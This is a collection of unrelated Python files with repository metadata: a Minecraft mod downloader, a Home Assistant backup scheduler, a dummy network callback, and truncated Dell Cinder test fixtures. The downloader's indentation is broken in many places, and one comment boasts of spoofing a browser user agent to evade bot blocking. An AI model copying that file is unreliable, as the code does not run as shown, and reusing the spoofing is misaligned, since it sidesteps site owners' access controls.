# Author: Photonic #
# Date:U/N #
#----------------#
import urllib2
import os
import sys
# Class Mod defines the mod object
'''
#############################
# Class for "mod" objects. #
# Used to store all data #
# related to mods. #
#############################
'''
class Mod:
def __init__(self, name, url):
		self.name = name		# Stores the name of the mod (supplied by the user)
self.filename = name + '.jar' # Need to make this a part of the entire file. But I'll do it tomorrow.
		self.url = url   # Stores the URL of the mod (supplied by the user)
		self.state = 0		# Used to indicate whether the mod was downloaded successfully
self.installed = 0
#Defines the alternative constructor "create_mod"
'''
#####################################################################################################
	# create_mod takes in a string that holds two values separated by a colon, i.e. ("name:url"),      #
	# and splits them into the vars name and url, which are then fed into the class "Mod"              #
	# to create an instance of itself, e.g. mod = Mod.create_mod("IC2:ic2.download.net")               #
#####################################################################################################
'''
@classmethod
def create_mod(cls, string):
		name, url = string.split(':')	# Grab the string var and split it at ":", then store the results inside "name" and "url"
		return cls(name, 'https://' + url)	 # Create an instance of the class "Mod" and return it.
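	# For example (hypothetical address): Mod.create_mod("IC2:files.example.net/ic2.jar") yields a Mod
	# whose name is "IC2", whose filename is "IC2.jar" and whose url is "https://files.example.net/ic2.jar".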
# Defines the fetch function "download_mod"
'''
#########################################################################################
	#download_mod takes 'name' and 'url', then changes the directory to 'temp',            #
	#then creates a Request using urllib2 and saves it inside 'request',                   #
	#then adds a user agent using "add_header". It opens the url, saves the result inside  #
	#'response', then reads data from 'response' until there is no data left.              #
#########################################################################################
'''
def download_mod(self):
chunk_size = 16 * 1024 # How many bytes to read from the buffer at once
# Attempt to change current directory to 'temp'
try:
os.chdir('temp')
except: # If can't change to "temp" directory, exit the program
			print("Error: Could not access directory 'temp', not present or access denied.\n")
sys.exit()
		request = urllib2.Request(self.url)	# Create a "Request" and save it inside of the var 'request'
		request.add_header('User-agent', 'Mozilla 5.10')	# add a user agent to the header to avoid the pesky bureaucrats' attempts at stopping our bot. hehehehe
#Attempt to Open the URL
try:
print("Attempting to connect to ---> {}".format(self.url))
response = urllib2.urlopen(request) # Attempt to open URL@'url' and saves it in 'response'
print("Connected to ---> {}\n".format(self.url))
except:
			print("Error: Could not connect to ---> {}\nConnection dropped, blocked, or nothing is at {}\n".format(self.url, self.url))
sys.exit()
# This is for debugging
#resp_info = response.info() # Get header info
#print(resp_info) # <<< For debugging
# Attempt to download file from URL.
try:
print("Opening file to write to.\n")
with open(self.filename, 'wb') as file_handler: # Open file as 'file_handler'
print("Downloading {},\nThis may take a while.".format(self.filename))
while True:
chunk = response.read(chunk_size) # Read 'chunk_size' from buffer into the var 'chunk'
if not chunk:break # If no more data from 'chunk' break out of loop
file_handler.write(chunk) # Write var 'chunk' to file_handler
			self.state = True	 # Set to True if the mod was downloaded successfully
			print("Successfully downloaded {}\n".format(self.filename))
os.chdir('..')
except:
os.chdir('..')
print("Error: Could not download {}@{}\n".format(self.filename, self.url))
			self.state = False	# Set to False if an error was encountered while attempting to download the mod file
	# Return to source dir
	#------------------------------------------------------- #
	# Checks to see if the mod was downloaded successfully,   #
	# then changes the directory to 'temp' and installs the   #
	# mod into the directory given by 'path', then deletes    #
	# 'filename' from the "temp" directory.                   #
	#------------------------------------------------------- #
def install_mod(self, path):
		if self.state:	# Checks to see if the mod was downloaded successfully
try:
os.chdir("temp") # Attempts to change the directory to temp
except:
				print("Error: Could not access directory 'temp', not present or access denied.\n")
try:
				print("Attempting to install {}.".format(self.filename))
				os.rename("{}\{}".format(os.getcwd(), self.filename), "{}\{}".format(path, self.filename))	 # Attempts to move the file to 'path'
				print("Mod successfully installed.\n")
os.chdir('..')
return 1
except:
				print("Error: Problem installing mod, file or directory not found, or insufficient privileges\n")
os.chdir('..')
return 0
try:
os.chdir('temp')
os.remove(self.filename)
os.chdir('..')
except:
os.chdir('..')
else:
print('Skipping {}\n>>>>\n'.format(self.filename))
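# A rough usage sketch (hypothetical mod name, URL and install path); it assumes a 'temp'
# directory exists next to this script, which download_mod and install_mod both rely on.
if __name__ == '__main__':
	example_mod = Mod.create_mod("ExampleMod:files.example.net/ExampleMod.jar")
	example_mod.download_mod()
	example_mod.install_mod("C:\\Games\\Minecraft\\mods")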
| 44.370968 | 157 | 0.57361 | [
"BSD-2-Clause"
] | photonic-bit/TripleM | Main/Mod_Obj.py | 5,502 | Python |
from datetime import datetime, timedelta
from io import IOBase
from typing import Dict, Generic, List, Optional, Tuple, TypeVar
from injector import inject, singleton
from .backupscheme import GenerationalScheme, OldestScheme, DeleteAfterUploadScheme
from backup.config import Config, Setting, CreateOptions
from backup.exceptions import DeleteMutlipleBackupsError, SimulatedError
from backup.util import GlobalInfo, Estimator, DataCache
from .backups import AbstractBackup, Backup
from .dummybackup import DummyBackup
from backup.time import Time
from backup.worker import Trigger
from backup.logger import getLogger
logger = getLogger(__name__)
T = TypeVar('T')
class BackupSource(Trigger, Generic[T]):
def __init__(self):
super().__init__()
pass
def name(self) -> str:
return "Unnamed"
def title(self) -> str:
return "Default"
def enabled(self) -> bool:
return True
def needsConfiguration(self) -> bool:
return not self.enabled()
def upload(self) -> bool:
return True
def icon(self) -> str:
return "sd_card"
def freeSpace(self):
return None
async def create(self, options: CreateOptions) -> T:
pass
async def get(self) -> Dict[str, T]:
pass
async def delete(self, backup: T):
pass
async def ignore(self, backup: T, ignore: bool):
pass
async def save(self, backup: AbstractBackup, bytes: IOBase) -> T:
pass
async def read(self, backup: T) -> IOBase:
pass
async def retain(self, backup: T, retain: bool) -> None:
pass
    def maxCount(self) -> int:
return 0
def postSync(self) -> None:
return
# Gets called after reading state but before any changes are made
# to check for additional errors.
def checkBeforeChanges(self) -> None:
pass
class BackupDestination(BackupSource):
def isWorking(self):
return False
@singleton
class Model():
@inject
def __init__(self, config: Config, time: Time, source: BackupSource, dest: BackupDestination, info: GlobalInfo, estimator: Estimator, data_cache: DataCache):
self.config: Config = config
self.time = time
self.source: BackupSource = source
self.dest: BackupDestination = dest
self.reinitialize()
self.backups: Dict[str, Backup] = {}
self.firstSync = True
self.info = info
self.simulate_error = None
self.estimator = estimator
self.waiting_for_startup = False
self.ignore_startup_delay = False
self._data_cache = data_cache
def enabled(self):
if self.source.needsConfiguration():
return False
if self.dest.needsConfiguration():
return False
return True
def allSources(self):
return [self.source, self.dest]
def reinitialize(self):
self._time_of_day: Optional[Tuple[int, int]] = self._parseTimeOfDay()
# SOMEDAY: this should be cached in config and regenerated on config updates, not here
self.generational_config = self.config.getGenerationalConfig()
def getTimeOfDay(self):
return self._time_of_day
def _nextBackup(self, now: datetime, last_backup: Optional[datetime]) -> Optional[datetime]:
timeofDay = self.getTimeOfDay()
if self.config.get(Setting.DAYS_BETWEEN_BACKUPS) <= 0:
next = None
elif self.dest.needsConfiguration():
next = None
elif not last_backup:
next = now - timedelta(minutes=1)
elif not timeofDay:
next = last_backup + timedelta(days=self.config.get(Setting.DAYS_BETWEEN_BACKUPS))
else:
newest_local: datetime = self.time.toLocal(last_backup)
time_that_day_local = datetime(newest_local.year, newest_local.month,
newest_local.day, timeofDay[0], timeofDay[1], tzinfo=self.time.local_tz)
if newest_local < time_that_day_local:
# Latest backup is before the backup time for that day
next = self.time.toUtc(time_that_day_local)
else:
# return the next backup after the delta
next = self.time.toUtc(
time_that_day_local + timedelta(days=self.config.get(Setting.DAYS_BETWEEN_BACKUPS)))
        # Don't back up within X minutes of startup, since that can put an unreasonable amount of strain on
        # a system that is just booting up.
if next is not None and next < now and now < self.info.backupCooldownTime() and not self.ignore_startup_delay:
self.waiting_for_startup = True
return self.info.backupCooldownTime()
else:
self.waiting_for_startup = False
return next
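    # Illustrative walk-through of the scheduling above (values invented for this note):
    # with DAYS_BETWEEN_BACKUPS = 3 and BACKUP_TIME_OF_DAY = "02:30", a newest backup taken
    # at 01:00 local time schedules the next run for 02:30 the same day, while one taken at
    # 03:00 schedules it for 02:30 three days later. In either case, if the scheduled time
    # has already passed but "now" is still inside backupCooldownTime() after a restart
    # (and the startup delay isn't ignored), the returned time is pushed out to the end of
    # the cooldown instead.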
def nextBackup(self, now: datetime):
latest = max(filter(lambda s: not s.ignore(), self.backups.values()),
default=None, key=lambda s: s.date())
if latest:
latest = latest.date()
return self._nextBackup(now, latest)
async def sync(self, now: datetime):
if self.simulate_error is not None:
if self.simulate_error.startswith("test"):
raise Exception(self.simulate_error)
else:
raise SimulatedError(self.simulate_error)
await self._syncBackups([self.source, self.dest])
self.source.checkBeforeChanges()
self.dest.checkBeforeChanges()
if not self.dest.needsConfiguration():
if self.source.enabled():
await self._purge(self.source)
if self.dest.enabled():
await self._purge(self.dest)
# Delete any "ignored" backups that have expired
if (self.config.get(Setting.IGNORE_OTHER_BACKUPS) or self.config.get(Setting.IGNORE_UPGRADE_BACKUPS)) and self.config.get(Setting.DELETE_IGNORED_AFTER_DAYS) > 0:
cutoff = now - timedelta(days=self.config.get(Setting.DELETE_IGNORED_AFTER_DAYS))
delete = []
for backup in self.backups.values():
if backup.ignore() and backup.date() < cutoff:
delete.append(backup)
for backup in delete:
await self.deleteBackup(backup, self.source)
self._handleBackupDetails()
next_backup = self.nextBackup(now)
if next_backup and now >= next_backup and self.source.enabled() and not self.dest.needsConfiguration():
if self.config.get(Setting.DELETE_BEFORE_NEW_BACKUP):
await self._purge(self.source, pre_purge=True)
await self.createBackup(CreateOptions(now, self.config.get(Setting.BACKUP_NAME)))
await self._purge(self.source)
self._handleBackupDetails()
if self.dest.enabled() and self.dest.upload():
# get the backups we should upload
uploads = []
for backup in self.backups.values():
if backup.getSource(self.source.name()) is not None and backup.getSource(self.source.name()).uploadable() and backup.getSource(self.dest.name()) is None and not backup.ignore():
uploads.append(backup)
uploads.sort(key=lambda s: s.date())
uploads.reverse()
for upload in uploads:
# only upload if doing so won't result in it being deleted next
dummy = DummyBackup(
"", upload.date(), self.dest.name(), "dummy_slug_name")
proposed = list(self.backups.values())
proposed.append(dummy)
if self._nextPurge(self.dest, proposed) != dummy:
if self.config.get(Setting.DELETE_BEFORE_NEW_BACKUP):
await self._purge(self.dest, pre_purge=True)
upload.addSource(await self.dest.save(upload, await self.source.read(upload)))
await self._purge(self.dest)
self._handleBackupDetails()
else:
break
if self.config.get(Setting.DELETE_AFTER_UPLOAD):
await self._purge(self.source)
self._handleBackupDetails()
self.source.postSync()
self.dest.postSync()
self._data_cache.saveIfDirty()
def isWorkingThroughUpload(self):
return self.dest.isWorking()
async def createBackup(self, options):
if not self.source.enabled():
return
self.estimator.refresh()
self.estimator.checkSpace(list(self.backups.values()))
created = await self.source.create(options)
backup = Backup(created)
self.backups[backup.slug()] = backup
async def deleteBackup(self, backup, source):
if not backup.getSource(source.name()):
return
slug = backup.slug()
await source.delete(backup)
backup.removeSource(source.name())
if backup.isDeleted():
del self.backups[slug]
def getNextPurges(self):
purges = {}
for source in [self.source, self.dest]:
purges[source.name()] = self._nextPurge(
source, self.backups.values(), findNext=True)
return purges
def _parseTimeOfDay(self) -> Optional[Tuple[int, int]]:
from_config = self.config.get(Setting.BACKUP_TIME_OF_DAY)
if len(from_config) == 0:
return None
parts = from_config.split(":")
if len(parts) != 2:
return None
try:
hour: int = int(parts[0])
minute: int = int(parts[1])
if hour < 0 or minute < 0 or hour > 23 or minute > 59:
return None
return (hour, minute)
except ValueError:
# Parse error
return None
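    # Worked example for the parser above: "03:30" parses to (3, 30), while "", "0330" and
    # "3:75" all fall through to None (missing colon or out-of-range minute).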
async def _syncBackups(self, sources: List[BackupSource]):
for source in sources:
if source.enabled():
from_source: Dict[str, AbstractBackup] = await source.get()
else:
from_source: Dict[str, AbstractBackup] = {}
for backup in from_source.values():
if backup.slug() not in self.backups:
self.backups[backup.slug()] = Backup(backup)
else:
self.backups[backup.slug()].addSource(backup)
for backup in list(self.backups.values()):
if backup.slug() not in from_source:
slug = backup.slug()
backup.removeSource(source.name())
if backup.isDeleted():
del self.backups[slug]
self.firstSync = False
def _buildDeleteScheme(self, source, findNext=False):
count = source.maxCount()
if findNext:
count -= 1
if source == self.source and self.config.get(Setting.DELETE_AFTER_UPLOAD):
return DeleteAfterUploadScheme(source.name(), [self.dest.name()])
elif self.generational_config:
return GenerationalScheme(
self.time, self.generational_config, count=count)
else:
return OldestScheme(count=count)
def _buildNamingScheme(self):
source = max(filter(BackupSource.enabled, self.allSources()), key=BackupSource.maxCount)
return self._buildDeleteScheme(source)
def _handleBackupDetails(self):
self._buildNamingScheme().handleNaming(self.backups.values())
def _nextPurge(self, source: BackupSource, backups, findNext=False):
"""
Given a list of backups, decides if one should be purged.
"""
if not source.enabled() or len(backups) == 0:
return None
if source.maxCount() == 0 and not self.config.get(Setting.DELETE_AFTER_UPLOAD):
return None
scheme = self._buildDeleteScheme(source, findNext=findNext)
consider_purging = []
for backup in backups:
source_backup = backup.getSource(source.name())
if source_backup is not None and source_backup.considerForPurge() and not backup.ignore():
consider_purging.append(backup)
if len(consider_purging) == 0:
return None
return scheme.getOldest(consider_purging)
async def _purge(self, source: BackupSource, pre_purge=False):
while True:
purge = self._getPurgeList(source, pre_purge)
if len(purge) <= 0:
return
if len(purge) > 1 and (self.config.get(Setting.CONFIRM_MULTIPLE_DELETES) and not self.info.isPermitMultipleDeletes()):
raise DeleteMutlipleBackupsError(self._getPurgeStats())
await self.deleteBackup(purge[0], source)
def _getPurgeStats(self):
ret = {}
for source in [self.source, self.dest]:
ret[source.name()] = len(self._getPurgeList(source))
return ret
def _getPurgeList(self, source: BackupSource, pre_purge=False):
if not source.enabled():
return []
candidates = list(self.backups.values())
purges = []
while True:
next_purge = self._nextPurge(source, candidates, findNext=pre_purge)
if next_purge is None:
return purges
else:
purges.append(next_purge)
candidates.remove(next_purge)
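# A minimal, self-contained sketch (names invented here, not part of the module above) of
# the cutoff rule Model.sync() applies to "ignored" backups: anything ignored and older
# than DELETE_IGNORED_AFTER_DAYS is queued for deletion.
def _expired_ignored_dates(backup_dates, now, delete_after_days):
    from datetime import timedelta
    cutoff = now - timedelta(days=delete_after_days)
    return [date for date in backup_dates if date < cutoff]
# e.g. with now = June 10th and delete_after_days = 7, a backup dated June 1st is returned
# while one dated June 9th is not.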
| 38.662921 | 194 | 0.596338 | [
"MIT"
] | voxipbx/hassio-addons | hassio-google-drive-backup/backup/model/model.py | 13,764 | Python |
# -*- coding: utf8 -*-
'''
Dummy callback object definition
@author: Luis Barrios Hernández
@version: 1.0
'''
from network.manager.networkManager import NetworkCallback
class DummyCallback(NetworkCallback):
def processPacket(self, packet):
        print(packet._serialize())
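# A minimal usage sketch for the callback above; _FakePacket is a stand-in invented here,
# since the real packet type comes from the cygnus-cloud network package imported above.
class _FakePacket(object):
    def _serialize(self):
        return "<serialized packet>"

if __name__ == "__main__":
    DummyCallback().processPacket(_FakePacket())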
| 21.538462 | 58 | 0.739286 | [
"Apache-2.0"
] | lbarriosh/cygnus-cloud | src/Infraestructura/network/tests/dummyCallback.py | 281 | Python |
# Copyright (c) 2015 Dell Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
import requests
from requests import models
import uuid
from cinder import context
from cinder import exception
from cinder import test
from cinder.volume.drivers.dell import dell_storagecenter_api
# We patch these here as they are used by every test, to keep the tests
# from trying to contact a Dell Storage Center.
@ddt.ddt
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'__init__',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'close_connection')
class DellSCSanAPITestCase(test.TestCase):
"""DellSCSanAPITestCase
Class to test the Storage Center API using Mock.
"""
SC = {u'IPv6ManagementIPPrefix': 128,
u'connectionError': u'',
u'instanceId': u'64702',
u'scSerialNumber': 64702,
u'dataProgressionRunning': False,
u'hostOrIpAddress': u'192.168.0.80',
u'userConnected': True,
u'portsBalanced': True,
u'managementIp': u'192.168.0.80',
u'version': u'6.5.1.269',
u'location': u'',
u'objectType': u'StorageCenter',
u'instanceName': u'Storage Center 64702',
u'statusMessage': u'',
u'status': u'Up',
u'flashOptimizedConfigured': False,
u'connected': True,
u'operationMode': u'Normal',
u'userName': u'Admin',
u'nonFlashOptimizedConfigured': True,
u'name': u'Storage Center 64702',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'serialNumber': 64702,
u'raidRebalanceRunning': False,
u'userPasswordExpired': False,
u'contact': u'',
u'IPv6ManagementIP': u'::'}
VOLUME = {u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName': u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}
VOLUME_LIST = [{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName':
u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}]
# Volume list that contains multiple volumes
VOLUME_LIST_MULTI_VOLS = [
{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName':
u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False},
{u'instanceId': u'64702.3495',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3495,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName':
u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da9',
u'active': True,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}]
VOLUME_CONFIG = \
{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'maximumSiblingCount': 100,
u'writeCacheStatus': u'Up',
u'objectType': u'ScVolumeConfiguration',
u'currentSiblingConfiguredSize': u'2.147483648E9 Bytes',
u'compressionPaused': False,
u'enforceConsumptionLimit': False,
u'volumeSpaceConsumptionLimit': u'2.147483648E9 Bytes',
u'readCacheEnabled': True,
u'writeCacheEnabled': True,
u'instanceName': u'volume-ff9589d3-2d41-48d5-9ef5-2713a875e85b',
u'dateModified': u'04/03/2015 12:01:08 AM',
u'modifyUser': u'Admin',
u'replayExpirationPaused': False,
u'currentSiblingCount': 1,
u'replayCreationPaused': False,
u'replayProfileList': [{u'instanceId': u'64702.2',
u'instanceName': u'Daily',
u'objectType': u'ScReplayProfile'}],
u'dateCreated': u'04/04/2014 03:54:26 AM',
u'volume': {u'instanceId': u'64702.3494',
u'instanceName':
u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'objectType': u'ScVolume'},
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'coalesceIntoActive': False,
u'createUser': u'Admin',
u'importToLowestTier': False,
u'readCacheStatus': u'Up',
u'maximumSiblingConfiguredSpace': u'5.49755813888E14 Bytes',
u'storageProfile': {u'instanceId': u'64702.1',
u'instanceName': u'Recommended',
u'objectType': u'ScStorageProfile'},
u'scName': u'Storage Center 64702',
u'notes': u'',
u'diskFolder': {u'instanceId': u'64702.3',
u'instanceName': u'Assigned',
u'objectType': u'ScDiskFolder'},
u'openVmsUniqueDiskId': 48,
u'compressionEnabled': False}
INACTIVE_VOLUME = \
{u'instanceId': u'64702.3494',
u'scSerialNumber': 64702,
u'replicationSource': False,
u'liveVolume': False,
u'vpdId': 3496,
u'objectType': u'ScVolume',
u'index': 3494,
u'volumeFolderPath': u'devstackvol/fcvm/',
u'hostCacheEnabled': False,
u'usedByLegacyFluidFsNasVolume': False,
u'inRecycleBin': False,
u'volumeFolderIndex': 17,
u'instanceName': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'statusMessage': u'',
u'status': u'Up',
u'storageType': {u'instanceId': u'64702.1',
u'instanceName': u'Assigned - Redundant - 2 MB',
u'objectType': u'ScStorageType'},
u'cmmDestination': False,
u'replicationDestination': False,
u'volumeFolder': {u'instanceId': u'64702.17',
u'instanceName': u'fcvm',
u'objectType': u'ScVolumeFolder'},
u'deviceId': u'6000d31000fcbe000000000000000da8',
u'active': False,
u'portableVolumeDestination': False,
u'deleteAllowed': True,
u'name': u'volume-37883deb-85cd-426a-9a98-62eaad8671ea',
u'scName': u'Storage Center 64702',
u'secureDataUsed': False,
u'serialNumber': u'0000fcbe-00000da8',
u'replayAllowed': True,
u'flashOptimized': False,
u'configuredSize': u'1.073741824E9 Bytes',
u'mapped': False,
u'cmmSource': False}
SCSERVER = {u'scName': u'Storage Center 64702',
u'volumeCount': 0,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 4,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'Server_21000024ff30441d',
u'instanceId': u'64702.47',
u'serverFolderPath': u'devstacksrv/',
u'portType': [u'FibreChannel'],
u'type': u'Physical',
u'statusMessage': u'Only 5 of 6 expected paths are up',
u'status': u'Degraded',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.4',
u'instanceName': u'devstacksrv',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Partial',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 5,
u'name': u'Server_21000024ff30441d',
u'hbaPresent': True,
u'hbaCount': 2,
u'notes': u'Created by Dell Cinder Driver',
u'mapped': False,
u'operatingSystem': {u'instanceId': u'64702.38',
u'instanceName': u'Red Hat Linux 6.x',
u'objectType': u'ScServerOperatingSystem'}
}
# ScServer where deletedAllowed=False (not allowed to be deleted)
SCSERVER_NO_DEL = {u'scName': u'Storage Center 64702',
u'volumeCount': 0,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 4,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'Server_21000024ff30441d',
u'instanceId': u'64702.47',
u'serverFolderPath': u'devstacksrv/',
u'portType': [u'FibreChannel'],
u'type': u'Physical',
u'statusMessage': u'Only 5 of 6 expected paths are up',
u'status': u'Degraded',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.4',
u'instanceName': u'devstacksrv',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Partial',
u'hostCacheIndex': 0,
u'deleteAllowed': False,
u'pathCount': 5,
u'name': u'Server_21000024ff30441d',
u'hbaPresent': True,
u'hbaCount': 2,
u'notes': u'Created by Dell Cinder Driver',
u'mapped': False,
u'operatingSystem':
{u'instanceId': u'64702.38',
u'instanceName': u'Red Hat Linux 6.x',
u'objectType': u'ScServerOperatingSystem'}
}
SCSERVERS = [{u'scName': u'Storage Center 64702',
u'volumeCount': 5,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 0,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'openstack4',
u'instanceId': u'64702.1',
u'serverFolderPath': u'',
u'portType': [u'Iscsi'],
u'type': u'Physical',
u'statusMessage': u'',
u'status': u'Up',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Up',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 0,
u'name': u'openstack4',
u'hbaPresent': True,
u'hbaCount': 1,
u'notes': u'',
u'mapped': True,
u'operatingSystem':
{u'instanceId': u'64702.3',
u'instanceName': u'Other Multipath',
u'objectType': u'ScServerOperatingSystem'}},
{u'scName': u'Storage Center 64702',
u'volumeCount': 1,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 0,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'openstack5',
u'instanceId': u'64702.2',
u'serverFolderPath': u'',
u'portType': [u'Iscsi'],
u'type': u'Physical',
u'statusMessage': u'',
u'status': u'Up',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Up',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 0, u'name': u'openstack5',
u'hbaPresent': True,
u'hbaCount': 1,
u'notes': u'',
u'mapped': True,
u'operatingSystem':
{u'instanceId': u'64702.2',
u'instanceName': u'Other Singlepath',
u'objectType': u'ScServerOperatingSystem'}}]
# ScServers list where status = Down
SCSERVERS_DOWN = \
[{u'scName': u'Storage Center 64702',
u'volumeCount': 5,
u'removeHbasAllowed': True,
u'legacyFluidFs': False,
u'serverFolderIndex': 0,
u'alertOnConnectivity': True,
u'objectType': u'ScPhysicalServer',
u'instanceName': u'openstack4',
u'instanceId': u'64702.1',
u'serverFolderPath': u'',
u'portType': [u'Iscsi'],
u'type': u'Physical',
u'statusMessage': u'',
u'status': u'Down',
u'scSerialNumber': 64702,
u'serverFolder': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'parentIndex': 0,
u'connectivity': u'Up',
u'hostCacheIndex': 0,
u'deleteAllowed': True,
u'pathCount': 0,
u'name': u'openstack4',
u'hbaPresent': True,
u'hbaCount': 1,
u'notes': u'',
u'mapped': True,
u'operatingSystem':
{u'instanceId': u'64702.3',
u'instanceName': u'Other Multipath',
u'objectType': u'ScServerOperatingSystem'}}]
MAP_PROFILE = {u'instanceId': u'64702.2941',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'lunUsed': [1],
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
